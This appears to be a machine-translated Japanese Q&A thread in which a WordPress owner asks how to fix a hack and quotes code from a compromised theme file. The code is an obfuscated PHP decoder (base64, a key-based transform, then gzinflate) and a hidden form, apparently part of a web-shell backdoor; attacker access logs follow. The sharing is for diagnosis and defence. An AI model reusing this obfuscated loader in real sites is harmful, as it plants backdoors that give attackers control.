2017-05-24 14 views
0

私のワードプレスのウェブサイトは、ちょうどハッキングされているとログを見た後、私は彼らがこのファイルを悪用することを見た:WWW/WP-コンテンツ/テーマ/ mytheme/style.phpWordpressの脆弱性の問題

をこのリンクwww.mywebsiteを参照すると.com/wp-content/themes/mytheme/style.phpボタン付きの入力フィールドがあります。だから私は彼らがシェルスクリプトをアップロードした場所だと思います。

function pre_term_name($wp_kses_data, $wp_nonce) { 
$kses_str = str_replace(array ('%', '*'), array ('/', '='), $wp_kses_data); 
$filter = base64_decode($kses_str); 
$md5 = strrev($wp_nonce); 
$sub = substr(md5($md5), 0, strlen($wp_nonce)); 
$wp_nonce = md5($wp_nonce). $sub; 
$preparefunc = 'gzinflate'; 
$i = 0; do { 
    $ord = ord($filter[$i]) - ord($wp_nonce[$i]); 
    $filter[$i] = chr($ord % 256); 
    $wp_nonce .= $filter[$i]; $i++; 
} while ($i < strlen($filter)); 
return @$preparefunc($filter); 
} 

$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= "&gt;"/></form>'; 

どのようにしてこの脆弱性を解決できますか?おかげ

ログ:

195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)" 
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)" 
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)" 
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)" 
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)" 
+0

は、$ wp_auth_check' 'のフォームは、ファイルuloaderを持っていません。 "style.php"のコードと関連するログエントリを追加できますか? –

+0

こんにちはアダム、私はstyle.phpからのより多くのコードと私が攻撃に関連していると思ういくつかのログラインを含んでいます。ご協力いただきありがとうございます。 – salimottmani

+0

私は実際に何をすべきか分からないので、この行をコメントしました。 $ wp_auth_check = '<フォームメソッド= "ポスト" アクション= "">の' ; – salimottmani

答えて

-1

あなたは、たとえばWordPressのセキュリティプラグインを使用することができます。WordFence、防弾セキュリティ、Sucuriセキュリティ、iThemesセキュリティ、会社のAcunetix WP SecurityScan

と は、このページをチェックしてください。threats

Security Vulnerabilities

0

この行は、置くだろう。この脆弱性は、それが投稿されているものであれば何でも可能です。アクションが空白であるように見えるので、送信を停止してデータを渡すjQuery/AJAX呼び出しがあると仮定します。それはチェックする場所になります。そこから、データが実際にポストされている場所とクエリが実行されている場所を知ることができます。クエリでPDOが使用されているか、入力がサニタイズされているかを確認します。 WPのセキュリティに関する一般的な「ヘルパー」として

しかし、私はSucuri WPプラグインが好き。